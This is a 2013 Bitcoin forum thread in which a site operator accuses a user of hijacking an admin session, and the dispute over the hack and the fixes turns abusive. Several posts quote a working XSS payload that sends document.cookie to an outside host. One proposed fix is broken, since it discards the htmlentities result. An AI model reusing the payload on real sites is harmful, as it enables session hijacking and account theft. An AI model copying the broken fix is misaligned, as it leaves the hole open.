Bitcoin Forum
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Author Topic: SCAMMER TradeFortress P-T'ed my site without permission, no damage afaik. CLOSED  (Read 5394 times)
MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 05:36:28 PM
Last edit: June 29, 2013, 09:40:58 PM by MoneypakTrader.com
 #1

UPDATE 6/3 SOLVED, no more entries will be reviewed.

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substitution blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.
SOLVED

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumbass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
You ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.
[...]

[...]
Scammer/Hacker wannabe TF hijacked an admin session via a sql injection directing the admin cookie to his site (code at bottom of post).
His Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com

There were a few minutes that Scammer/Hacker TF had access to the admin panel.
Fortunately, none of the info there is too bad and this piece of shit might not invade the privacy of the users.

UPDATE: It appears only limited, session information was stolen:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 02, 2013, 05:56:08 PM
 #2

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax. Undecided

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 06:01:54 PM
 #3

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax. Undecided
Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 02, 2013, 06:07:45 PM
 #4

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax. Undecided
Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).
You clearly are in rage (and in a lot of psychological pain I suppose). Relax because you're trying to tear down a building with a stick.

The 4ner
aka newbitcoinqtuser
Hero Member
*****
Offline Offline

Activity: 602
Merit: 500


R.I.P Silk Road 1.0


View Profile
June 02, 2013, 06:11:20 PM
 #5

Man this is a heavy accusation. Second accusation I've seen against TF since last month.
mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 02, 2013, 06:13:29 PM
 #6

Man this is a heavy accusation. Second accusation I've seen against TF since last month.
Yeah, I noticed too. It's kind of beginning to annoy me. He seems to have some kind of serious hatred for TradeFortress.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 06:15:27 PM
 #7

Who made the other accusation? Links will help counter troll mprep

ironcross360
Full Member
***
Offline Offline

Activity: 140
Merit: 100


Troll of the Fourth Reich.


View Profile
June 02, 2013, 06:16:41 PM
 #8

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substitution blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumbass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
You ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.
Which programmer did you pay? [Either I didn't code that part of your site or my code really is shit], security vulnerability:

[I can't see the code, but did get read/write access to the db, but don't know how the new storage system is named so can't do the bitcoin redirection I attempted]
Scammer/Hacker wannabe attempted to divert deposits from the site, using an apparently custom address for the attempted theft:
Fortunately, he knew so little of the code, he only managed to rewrite his personal deposit address to: 1KentoeyU1VuoD4oCBsnTm3yTXksGRiWww
Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com
Password Hash was destroyed unfortunately in a hurried attempt to block the hacker.

People may presume the possibility that Scammer/Hacker accessed all the account info generally visible about user account.
Fortunately, none of the info required is too bad and this piece of shit might not invade the privacy of these users (lawsuits are valid against him if he does so).

UPDATE: It appears only limited, session information was stolen, could use help minimizing this damage in the future:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
Maybe you shouldn't have hacked him first.

Why are you just staring at this? Just send it! 1MHZjADM41ttjbPUiTPYWGYGm45XLf8ZeS
mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 02, 2013, 06:19:37 PM
 #9

Who made the other accusation? Links will help counter troll mprep
Dude, what's your problem? You seem to be full of hatred to everyone. And that's just my opinion that I'm not forcing on to you. I tell what I think and I don't give a damn if you like or care about it or not. You should sit down, relax and stop attacking everyone who's not with you. If I wanted to fight against you, I would've made a separate thread.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 06:23:03 PM
 #10

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 02, 2013, 06:28:36 PM
 #11

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
Understood. I wish you good luck in your further pursuits if they are honorable and fair. I don't even want to get between the conflict (or dispute, whatever you call it) with you and TradeFortress.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 07:35:37 PM
 #12

Here are his messages in the site that led to the PHPSESSID HACK
Jun 1, 09:17:41 foobar
Message: So what do I do now? Do I get moneypak codes ? Do I get bitcoin? do I get balance to my debit card? what is your service
Jun 1, 09:16:29 foobar
Message: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
Jun 1, 09:02:38 foobar
Message: <b>foo</b>
Jun 1, 09:02:29 foobar
Message: how does this work

MagicBit15
Sr. Member
****
Offline Offline

Activity: 294
Merit: 250


Let's Start a Cryptolution!!


View Profile
June 02, 2013, 08:59:25 PM
 #13

Why are you getting hacked so much?

Social engineering or are you just coding that poorly and not debugging properly before you launch?

Tips for Tips: 1Jy8ZycPNjnwNLevNwoRRqPAKkZ8Fqnukc
I won the poetry contest!! https://bitcointalk.org/index.php?topic=219714.40 Thank You, Sir Lambert!!
+5 Rep: Successful Forum Transactions: https://bitcointalk.org/index.php?topic=176117.0  https://bitcointalk.org/index.php?topic=209024.0 https://bitcointalk.org/index.php?topic=233052 Check My Rep!!
wachtwoord
Legendary
*
Offline Offline

Activity: 2324
Merit: 1125


View Profile
June 02, 2013, 09:25:45 PM
 #14

I PM'ed this but MPT asked to post it here instead:

Hey,

You asked to fix the following code:

Code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

Code:
if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query("SELECT * FROM users WHERE name='{$name}'");

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Do you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.

If I misunderstood and you mean something else altogether, please clarify Smiley

Regards
MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 09:29:38 PM
 #15

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?
The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:
I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
It's more like hundreds of BTC, but same difference.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 02, 2013, 09:40:29 PM
 #16

I PM'ed this but MPT asked to post it here instead:
Hey,
You asked to fix the following code:
Code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):
Code:
if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query("SELECT * FROM users WHERE name='{$name}'");
Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Do you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.
If I misunderstood and you mean something else altogether, please clarify Smiley
Regards
Looks like stripslashes doesn't block opening a line of code, does it?

MagicBit15
Sr. Member
****
Offline Offline

Activity: 294
Merit: 250


Let's Start a Cryptolution!!


View Profile
June 02, 2013, 10:01:51 PM
 #17

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?
The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:
I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
It's more like hundreds of BTC, but same difference.

Ah I see that sucks, No way you can contact him? Or is he not responding at all, email or skype or anything?

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Offline Offline

Activity: 1316
Merit: 1043

👻


View Profile
June 02, 2013, 10:04:11 PM
 #18

LOL? Prove that I have "changed my deposit address", that was the auto generated one. You can't even change it, bitcoind or Blockchain.info doesn't let you. It looks like a vanity address though Cheesy

Anyway, show me the damages I've done to you. Which is nothing other than your site's reputation, which I think is fair - an eye for an eye. I regularly try to break into sites, and I always disclose it to the owners without any malicious damages done. For some people, I do it publicly.

Here: htmlentities( [db output] ). It's funny how there are so many responses yet no one knows basic web security.
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Offline Offline

Activity: 1316
Merit: 1043

👻


View Profile
June 02, 2013, 10:24:03 PM
 #19

Thanks for advertising my pentesting skills too! Wink
danieldaniel
Hero Member
*****
Offline Offline

Activity: 854
Merit: 1000


View Profile
June 02, 2013, 10:29:35 PM
 #20

All you have to do is htmlentities(<data that you want to clean>);

Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit:
Fully functioning code:
-Start-
while ($xyz = $mnop->fetch()) {
htmlentities($xyz);
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
-End-
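
Added example (not code from any poster in this thread): the message loop with output encoding applied to the field and the encoded return value actually used, plus HttpOnly on the session cookie so injected script cannot read PHPSESSID through document.cookie. The function names, the `$rows` sample data (standing in for what `$mnop->fetch()` returns) and the HTTPS setting are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: not code from any poster in this thread.
// harden_session_cookie(), html_text() and render_messages() are
// hypothetical names; $rows stands in for the rows $mnop->fetch() returns.

/**
 * Set the session cookie flags. Call before session_start() and before any
 * output. HttpOnly keeps the PHPSESSID cookie out of document.cookie, so
 * script injected into a page cannot read it. Array form needs PHP 7.3+.
 */
function harden_session_cookie(): bool
{
    return session_set_cookie_params([
        'lifetime' => 0,      // session cookie, dropped when the browser closes
        'path'     => '/',
        'secure'   => true,   // assumption: the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

/**
 * Encode one value for an HTML text context.
 * ENT_QUOTES also encodes ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
 * sequences instead of returning an empty string.
 */
function html_text(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the message list. The encoding happens at the point of output, on
 * the string field itself, and the RETURN value is what gets concatenated.
 * A bare htmlentities($xyz); statement changes nothing: the function
 * returns a new string and never modifies its argument, and $xyz is an
 * array, not a string.
 */
function render_messages(iterable $rows): string
{
    $html = '';
    foreach ($rows as $xyz) {
        $html .= '<br /><strong>Message:</strong> '
               . html_text((string) ($xyz['stuff'] ?? ''))
               . '<br />';
    }
    return $html;
}

// Constructed sample rows; the second is the harmless markup probe that
// appears in the message log quoted in this thread.
$rows = [
    ['stuff' => 'how does this work'],
    ['stuff' => '<b>foo</b>'],
    ['stuff' => '<script>/* constructed sample */</script>'],
];

harden_session_cookie();
echo render_messages($rows), PHP_EOL;
```

Every `<`, `>`, `&` and quote in the stored message reaches the browser as an entity, so the admin panel shows the markup as text instead of running it.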

Pichu
Newbie
*
Offline Offline

Activity: 40
Merit: 0


View Profile
June 02, 2013, 10:35:22 PM
 #21

lol'd. I wouldn't do service with someone who doesn't secure his website properly before he takes on lots of clients. GJ TradeFortress.
MagicBit15
Sr. Member
****
Offline Offline

Activity: 294
Merit: 250


Let's Start a Cryptolution!!


View Profile
June 02, 2013, 10:44:29 PM
 #22

Oh TradeFORtress was the one that coded your site? I didn't read that part, I thought it was someone with a copycat name.

You're an idiot, Tradefortress is a legend, your rant is random, probably fake scam report, and invalid. If your site got hacked by someone else, still your fault, it's your website.

/Thread

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Offline Offline

Activity: 1316
Merit: 1043

👻


View Profile
June 02, 2013, 11:51:08 PM
Last edit: June 03, 2013, 12:04:25 AM by TradeFortress
 #23

He is using some of my code. Two different developers have found it impossible to work with him. What does that tell you about him, or is it always the developers' fault?

Anyways, you still have vulnerabilities in your code. This is why you don't do financial sites when you have no basic web security knowledge.

If I am a 'scammer', why did I report a serious vulnerability on this forum you are reading right now instead of compromising the account of anyone I want? Because I don't do that.
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
June 03, 2013, 01:33:44 PM
 #24

Who do I give root access to my site to back the accusations?

My vote is on Pietila.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 03, 2013, 05:35:07 PM
 #25

Man, this discussion heated up quickly. Looks like MoneypakTrader does have some anger issues. Cheesy

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 07:18:33 PM
 #26

All you have to do is htmlentities(<data that you want to clean>);

Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit:
Fully functioning code:
-Start-
while ($xyz = $mnop->fetch()) {
htmlentities($xyz);
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
-End-
Thanks for trying to help, but your edit failed to work.
I'll investigate the function and find some solution.
Actually, I think I found the correct way to do it and your contribution helped a little.
Where do you want $20 BTC?

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 07:21:39 PM
 #27

Oh TradeFORtress was the one that coded your site? I didn't read that part, I thought it was someone with a copycat name.
You're an idiot, Tradefortress is a legend, your rant is random, probably fake scam report, and invalid. If your site got hacked by someone else, still your fault, it's your website.
/Thread
Counter-Troll:
He started to code it but failed/refused to finish, kept the 27 BTC I paid him and is now penetration testing me apparently to "advertise"
You're the idiot cause he admitted to all of this (except claims without evidence to have finished my site, particularly strange because another coder claims the same thing in these forums unless he took it down after getting his code p4wned).

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 07:28:06 PM
Last edit: June 09, 2013, 02:41:25 PM by MoneypakTrader.com
 #28

Anyways, you still have vulnerabilities in your code. This is why you don't do financial sites when you have no basic web security knowledge.

If I am a 'scammer', why did I report a serious vulnerability on this forum you are reading right now instead of compromising the account of anyone I want? Because I don't do that.
I appreciate you reporting the severe code vulnerability the coder who did my site introduced, I'll credit you with 3 BTC for the discovery.
Interest for 6 months on the 27 btc you deprived me of is 2.7 BTC (20% interest for involuntary debtor relationship).
You're down to 26.7 BTC that you owe me.
Please continue to penetration test my site to work off your debt.
I've decided to increase it from $360 to $1000 in BTC reward for the next critical vulnerability such as your admin account hack you did. That's a personal rate for you since I like you so much and need to get the solutions to a better site (price must include a full fix of the vulnerabilities discovered).

UPDATE offer refused by TF and retracted by me.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 07:29:42 PM
 #29

This problem is solved, please discontinue use/lock the thread.

Vod
Legendary
*
Offline Offline

Activity: 3696
Merit: 3070


Licking my boob since 1970


View Profile WWW
June 03, 2013, 07:50:50 PM
 #30

This problem is solved, please discontinue use/lock the thread.

You can lock your own threads.

https://nastyscam.com - landing page up     https://vod.fan - advanced image hosting - coming soon!
OGNasty has early onset dementia; keep this in mind when discussing his past actions.
MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 08:48:44 PM
 #31

This problem is solved, please discontinue use/lock the thread.

You can lock your own threads.
I know not of this magic

raze
Full Member
***
Offline Offline

Activity: 182
Merit: 100



View Profile
June 03, 2013, 10:47:35 PM
 #32

Hai im anon and will you pay me to hak ur siet?

BTC --16FPbgyUZdTm1voAfi26VZ3RH7apTFGaPm
LTC -- Lhd3gmj84BWqx7kQgqUA7gyoogsLeJbCXb
PPC -- PRpKGjgjNLFv8eR7VVv7jBaP8aexDFqk4C
MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 10:58:05 PM
 #33

Hai im anon and will you pay me to hak ur siet?
how do you do your forum sig like that?
I like my site the way it is: impenetrable.
I won't be paying for hacking services because the site is unhackable.
If the great TF can't hack it for $1000 in BTC then no one can.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 03, 2013, 11:03:33 PM
 #34

Thanks for advertising my pentesting skills too! Wink
looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
June 04, 2013, 01:19:29 AM
 #35

I like my site the way it is: impenetrable

Lol good one.

raze
Full Member
***
Offline Offline

Activity: 182
Merit: 100



View Profile
June 04, 2013, 01:46:59 AM
 #36

I like my site the way it is: impenetrable

Lol good one.

My thoughts exactly.

FYI, if it's on the internet, it's not safe. No exceptions.

Quote
looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

Minimal coding skills? Granted, they're not top-of-the-line, but you're the one here with a vulnerable website..

Is that $1k bounty open to the public?

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 04, 2013, 03:27:48 AM
 #37

I like my site the way it is: impenetrable

Lol good one.

My thoughts exactly.

FYI, if it's on the internet, it's not safe. No exceptions.

Quote
looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

Minimal coding skills? Granted, they're not top-of-the-line, but you're the one here with a vulnerable website..

Is that $1k bounty open to the public?
I'm not convinced you're a separate identity from tradefortress, prove that to me via torchat first.
If it includes the fix, I could probably do $50-$100 which is well above the standard for hourly contract work.

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Offline Offline

Activity: 1316
Merit: 1043

👻


View Profile
June 04, 2013, 06:57:07 AM
 #38

> If it includes the fix, I could probably do $50-$100 which is well above the standard for hourly contract work.

Are you serious?

Btw, your site still has a serious security vulnerability. I'll happily disclose it to you for your sum of $1,000, prepaid to my address. Or escrow with John.

I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.

In real value terms, the interest rate would be something like -90% given the gains in BTC. So assuming I gave you a refund, it would be $300 + CPI or another independent assessment of inflation.
raze
Full Member
***
Offline Offline

Activity: 182
Merit: 100



View Profile
June 04, 2013, 07:10:33 AM
 #39

I'm replying to a CLOSED thread, I'm such a rebel.

mprep
Global Moderator
Legendary
*
Offline Offline

Activity: 3766
Merit: 2610


In a world of peaches, don't ask for apple sauce


View Profile WWW
June 04, 2013, 07:31:58 AM
 #40

I'm replying to a CLOSED thread, I'm such a rebel.
Lol. So much for having this thread locked.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 04, 2013, 07:26:22 PM
 #41

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]

I hereby withdraw my offer for your P/T of my site, if you can prove to have conducted the P/T and produced the fixes and related work prior to now, I will credit your debt appropriately.

If anyone wants to assume TF debt, I am willing to assign it to an appropriate charity for collections.

MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
June 05, 2013, 09:24:42 AM
 #42

I'm replying to a CLOSED thread, I'm such a rebel.
Lol. So much for having this thread locked.

OP's implementation of thread locking has a serious vulnerability. Here's a bounty of 15 OMG WTF BBQ for anyone fixing it to be called a scammer.

MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 06, 2013, 01:47:06 AM
 #43

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]
I hereby withdraw my offer for your P/T of my site, [...]
My site received P/T's from 3 different new accounts since I withdrew the offer.
Total vulnerabilities = 0
Site has been upgraded to IMPENETRABLE status.

raze
Full Member
***
Offline Offline

Activity: 182
Merit: 100



View Profile
June 06, 2013, 06:43:33 AM
 #44

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]
I hereby withdraw my offer for your P/T of my site, [...]
My site received P/T's from 3 different new accounts since I withdrew the offer.
Total vulnerabilities = 0
Site has been upgraded to IMPENETRABLE status.

3 failed pentests make it impenetrable?

1. "Don't practice until you succeed, practice until you can't fail". I hate to burst your impenetrable bubble, but it only takes one person who knows something the others don't to exploit a site/server.

2. There's no such thing as impenetrable status. If you're smart, you'll stop taunting people to try and exploit your site.

3. You're naive enough to assume that you can keep a totally 100% hack-proof invulnerable site of awesomeness, but no-one else can? Even if there were no vulnerabilities found in your site now, what about tomorrow? Next week? New vulns are found every single day and made public, you can't be safe forever.

So just stop.

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Offline Offline

Activity: 1316
Merit: 1043

👻


View Profile
June 06, 2013, 06:45:12 AM
 #45

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.
MoneypakTrader.com (OP)
Sr. Member
****
Offline Offline

Activity: 472
Merit: 250


Never spend your money before you have it.


View Profile
June 07, 2013, 10:03:25 AM
 #46

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

raze
Full Member
***
Offline Offline

Activity: 182
Merit: 100



View Profile
June 07, 2013, 12:22:06 PM
 #47

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

Eesh, for a professional account, you should probably lay off with those sort of attacks. By all means speak your mind, but just be a little more civil, yeah? You're making your business look bad.

BTC --16FPbgyUZdTm1voAfi26VZ3RH7apTFGaPm
LTC -- Lhd3gmj84BWqx7kQgqUA7gyoogsLeJbCXb
PPC -- PRpKGjgjNLFv8eR7VVv7jBaP8aexDFqk4C
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Activity: 1316
Merit: 1043

👻
June 08, 2013, 01:36:32 AM
 #48

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

First of all, I did not use a SQL injection, I used XSS. Get your facts right.

Do you want to escrow? I send 27 BTC to John. You send 10 BTC. If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

Also, why the fuck would I steal your coins. I don't do that.
r3wt
Hero Member
*****
Activity: 686
Merit: 504

always the student, never the master.
June 08, 2013, 01:39:39 AM
 #49

I got my money on Tradefortress!!!

My negative trust rating is reflective of a personal vendetta by someone on default trust.
MoneypakTrader.com (OP)
Sr. Member
****
Activity: 472
Merit: 250

Never spend your money before you have it.
June 08, 2013, 05:07:19 AM
 #50

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.
[...]
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.
[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) which you could have easily hosted to show you actually did it, but can't because in reality you're incapable to code a bitcoin ecommerce website.

🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
*
Activity: 1316
Merit: 1043

👻
June 08, 2013, 05:41:57 AM
 #51

I'll send 50 BTC to John. You send 10 BTC to John. I hack your site, I get your 10 BTC and my 50 BTC. I can't hack your site, you get my 50 BTC and your 10 BTC.

When are we doing this? I always love free money :)
matt4054
Legendary
*
Activity: 1946
Merit: 1035
June 08, 2013, 05:42:45 AM
 #52

You had written CLOSED in the subject. You should have stuck to it. You are ridiculing yourself, IMHO. And really... read your FAQ again.... WTF is this ???

Quote
12. I need to know your business incorporation details and/or personal info before I invest. If you don't provide this I'm going to call you a scammer and flame you in the forums or otherwise blackmail you.

No, we won't be providing any of this info or otherwise cooperating with your blackmail attempts. If you persist in attempting to blackmail us, we will respond with countermeasures.

Do you know the difference between a commercial website, a forum post, and a PM?
I would never trust your website after reading such things. Your attitude is childish.
You can call me names now and prove me right, or you could learn a lesson and make some progress...
MoneypakTrader.com (OP)
Sr. Member
****
Activity: 472
Merit: 250

Never spend your money before you have it.
June 08, 2013, 07:42:34 AM
 #53

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.
[...]
 Your fraud isn't going to work here. Fool me once, you're a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.
[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

